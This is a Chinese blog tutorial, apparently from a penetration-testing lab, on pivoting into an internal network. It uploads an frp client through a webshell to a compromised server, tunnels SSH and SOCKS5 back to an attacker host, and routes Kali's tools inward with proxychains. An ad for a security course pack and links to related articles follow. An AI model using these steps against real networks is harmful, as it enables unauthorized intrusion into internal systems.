内网渗透--frp代理设置与proxychains代理设置

最新推荐文章于 2024-04-28 08:00:00 发布
最新推荐文章于 2024-04-28 08:00:00 发布
阅读量976 收藏 18
点赞数 19
文章标签: 安全 linux 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Innocence_0/article/details/136577887
版权

标题内网渗透–frp代理设置与proxychains代理设置

内网服务器内网IP地址外网IP地址
内网web服务器(windows 7)192.168.52.143192.168.213.138
内网域控服务器192.168.52.138
外网服务器外网IP地址外网V8网卡
外网kali192.168.213.132
外网windows攻击机192.168.0.137192.168.213.1

frps服务端配置

修改外网windows11主机上的frps.ini文件为:
![在这里插入图片描述](https://img-
blog.csdnimg.cn/2a8cbef148254ea39eda6f1a703f3986.png#pic_center)

[common]
bind_port = 7000                     # 外网监听端口

启动监听:

./frps -c ./frps.ini

![在这里插入图片描述](https://img-
blog.csdnimg.cn/30dca1a378fd4c358f3088fc60e13b0c.png#pic_center)

frpc客户端配置

将经过修改的windows版本的frp通过蚁剑终端上传到wen服务器上
![在这里插入图片描述](https://img-
blog.csdnimg.cn/6dc01a49f48443c9afb7c702887ce309.png#pic_center)

[common]
server_addr = 192.168.0.137                 # 外网windows地址
server_port = 7000                          # 外网监听端口

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000
 
[socks5]                                   # socks5代理设置,kali使用该代理加入战斗
type = tcp
plugin = socks5
remote_port = 5000

frp连接建立

客户端主动启动链接

frpc.exe -c frpc.ini

![在这里插入图片描述](https://img-
blog.csdnimg.cn/5a3edd1957224249b272491d48244748.png#pic_center)
服务端的外网window11连接成功
![在这里插入图片描述](https://img-
blog.csdnimg.cn/57f102aeebea486383c3e20231767e81.png#pic_center)

kali socks 代理连接

由于刚刚在frpc客户端配置文件中写入了socks5代理,此时我们可以使用kali中的proxychains,设置socks5代理加入网络中
只需修改 /etc/proxychains4.conf 文件的最后一行就可以了
![在这里插入图片描述](https://img-
blog.csdnimg.cn/1381644f2f104da990a315f0180764ea.png#pic_center)

socks5 192.168.213.1 5000        # 192.168.213.1是外网win11的v8网卡地址

这样,我们就可以通过kali和自己的win11主机发动对内网的攻击了

学习计划安排


我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~

这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!

如果你对网络安全入门感兴趣,那么你需要的话可以

点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

程序员负总裁
关注
  • 19
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网穿透(frpproxychains4)
一大口木的博客
11-13 1711
kali当frp服务器,kali克隆当客户端,客户端在配置文件里设置好自己开放的服务端口,客户端主动利用服务器开放自己的内网(全程ubuntu配好网络后就不用动),这时候,攻击机kali可以通过socks5搭建的隧道,使用proxychains连接访问。kali是外网的一台攻击者,win7在内网,而红帽在win7和kali的中间,也就是右手连接着外网(kali),左手连接着内网(win7)。输入这条命令阔以出现win7的80服务,我win7上下载的小皮,默认的网站我设置的4个1111。
FRP内网穿透及多级代理的使用
最新发布
imtech的博客
06-20 1452
今天借着proxifier和一个复杂一点的场景测试一下frp的基础功能和多级代理功能。其实我在某视频网站发过一次视频,由于水平有限没多少播放量,而且时间长了自己都忘了某些细节,所以今天用文字记录一下。下图是测试场景,比如渗透测试过程中黑客利用了S1对外映射的某Web服务的漏洞,通过该漏洞上传了webshell,控制了S1。这时候就想通过其他方式连接该服务器,比如3389端口,或者把S1当成跳板来进行横向渗透S2。这种情况下就可以使用frp最基础的功内网穿透。
frp多层内网隧道搭建 proxychainsproxyfier多层代理详细设置
qingan6的博客
05-16 4677
点击Proxychains 右边create将代理链按顺序从proxy servers里按住依次拖下,我这里起的名字代理链,都要拖在你起的这个名字(我这里是代理链)里,注意在同一级,如图所示。我们想访问192.168.54.0此时需要搭建第二层隧道。此时我们可以访问192.168.54.0这个网段了。此时我们可以访问192.168.52.0这个网段。按照这种方式不断搭建隧道,无论多少层我们都能访问。再增加一个代理,这里是设置的第二层代理。例如找到进程为 6666。可以访问93这个网段了。
frp使用
03-14 4938
实现端口转发 客户端配置 frpc.ini [common] server_addr = 192.168.74.140 //你的vps server_port = 7000 //你在vps 上的 frps.ini 上面设置的端口 [rdp] //只是个名称 type = tcp //端口类型 local_ip = 127.0.0.1 //要转发那一台设备的地址,可以填写同网段的其他设备 local_p
frp使用教程:安装及各种配置示例
多群转播的专栏
11-27 1054
有时想要让其他人通过域名访问或者测试我们在本地搭建的 web 服务,但是由于本地机器没有公网 IP,无法将域名解析到本地的机器,通过 frp 就可以实现这一功能,以下示例为 http 服务,https 服务配置方法相同, vhost_http_port 替换为 vhost_https_port, type 设置为 https 即可。所以不仅仅是 HTTP 服务,任何的 TCP 服务,只要支持这一协议,都可以获得用户的真实 IP 地址。该功能仅限于 http 类型的代理。具体使用方式请查看使用示例。
proxychains-proxychains-4.2.0.tar.gz
07-09
proxychains可以让命令通过指定的proxy访问网络.proxychains-proxychains-4.2.0.tar.gz
proxychains-ng-4.16.tar.xz
07-07
ProxyChainsLinux和其他Unix下的代理工具。 它可以使任何程序通过代理上网, 允许TCP和DNS通过代理隧道, 支持HTTP、 SOCKS4和SOCKS5类型的代理服务器, 并且可配置多个代理ProxyChains通过一个用户定义的代理...
第70天:内网安全-域横向内网漫游Socks代理隧道技术1
08-03
Linux系统中,通过proxychains配置代理,访问其他内网目标。 这些案例展示了内网穿透代理隧道技术在实际安全测试和攻防中的应用。它们不仅可以用于解决内网通信问题,还能在合法授权的情况下,帮助系统管理员进行...
proxychains-ng-4.14.tar.xz
10-09
ProxyChains HowTo (README) Public Forum ProxyChains project page at SourceForge Ezine articles about proxy servers (kind of humor) Proxy server search (try 1080 or 8080) About proxychains tool: * It'...
proxychains-4.5.tar.bz2
08-03
教程博客:https://blog.csdn.net/qq_43017750/article/details/107769679 转存源码包仅为帮助无法访问对应网站的网友进行下载,如有侵权请联系删除。
FRP:配置反向代理与内网穿透
we chat:玩转测试开发
03-12 2402
frp 是一个快速反向代理,帮助您将NAT或防火墙后面的本地服务器暴露到internet 的 开源、简洁易用、高性能的内网穿透和反向代理软件,支持 tcp, udp, http, https等协议,github Star 高达65.1k。3.2、家庭网络访问公司服务器:xshell等ssh连上外网ip所在的服务器,ssh端口1234。5、多个原生支持的客户端插件(静态文件查看,HTTP、SOCK5 代理等),1、配置服务端:外网ip所在的服务器,假设为:111.112.113.114。
使用云部署frps、实现私有化代理
igaohe的专栏
08-01 87
实现自己的花生壳,实现自己代理
内网渗透-frp 用于内网穿透的基本配置和使用
lza20001103的博客
04-15 1195
内网渗透-frp 用于内网穿透的基本配置和使用
利用Frp建立多层代理
ss810540895的博客
05-26 5967
原文 目录 简介 Frp原理 模拟环境 多层网络实战 Frp访问第一层网络 服务端配置 客户端配置 Proxifier连接 Frp访问第二层网络 Frp访问第三层网络 简介 frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。 frp 主要由 客户端(frpc) 和 服务端(frps) 组成,服务端,客户端通常部署在需要穿透的内网服务所在的机器上。 项目地址:frp · Gi
frp代理工具,2024年最新带你一起探究网络安全事件分发机制
2401_84166236的博客
04-09 906
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
使用frp实现内网穿透教程
热门推荐
霁晨晨晨的博客
04-28 3万+
frp 是一款高性能的反向代理应用,专注于内网穿透。它支持多种协议,包括 TCP、UDP、HTTP、HTTPS 等,并且具备 P2P 通信功能。使用 frp,您可以安全、便捷地将内网服务暴露到公网,通过拥有公网 IP 的节点进行中转。由于内网服务缺乏公网 IP 地址,因此无法直接被非局域网内的用户访问。用户通过访问服务端的 frps,frp 负责根据请求的端口或其他信息将请求路由到相应的内网机器,从而实现通信。
运维-[frp配置内网服务器访问外网]
没枕头我咋睡觉
03-22 634
同一局域网里面,两台服务器A服务器可以访问外网,代理端口为10809,B服务器不可访问外网。启动方式: frpc -c frpc.ini。启动方式: frps -c frps.ini。B服务器配置frp服务端 配置文件-frps.ini。server_port:B服务器frp端口。通过frp进行内网穿透配置代理服务。启动后出现success表示连接B服务frp成功。server_addr:B服务器IP。配置文件-frpc.ini。A服务器配置frp客户端。根据IP区域可判断代理配置成功。
frp代理搭建
weixin_54227009的博客
01-06 1193
摘要:如果要实现两台不同局域网之间利用msf通话的话,则需要用到frp或者是ngrok进行代理, ngrok有免费的,但是网络很卡,所以这里我们使用自己的服务器搭建一个frp代理
使用EarthWorm创建Socks5代理进行内网渗透教程
"这篇教程介绍了如何使用EarthWorm (EW) 作为Socks5代理进行内网渗透。EW是一款多功能的隧道工具,适用于多种操作系统,包括Linux、Windows等。文章内容包括如何在公网的Ubuntu服务器上配置 EW 作为反向Socks5代理,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值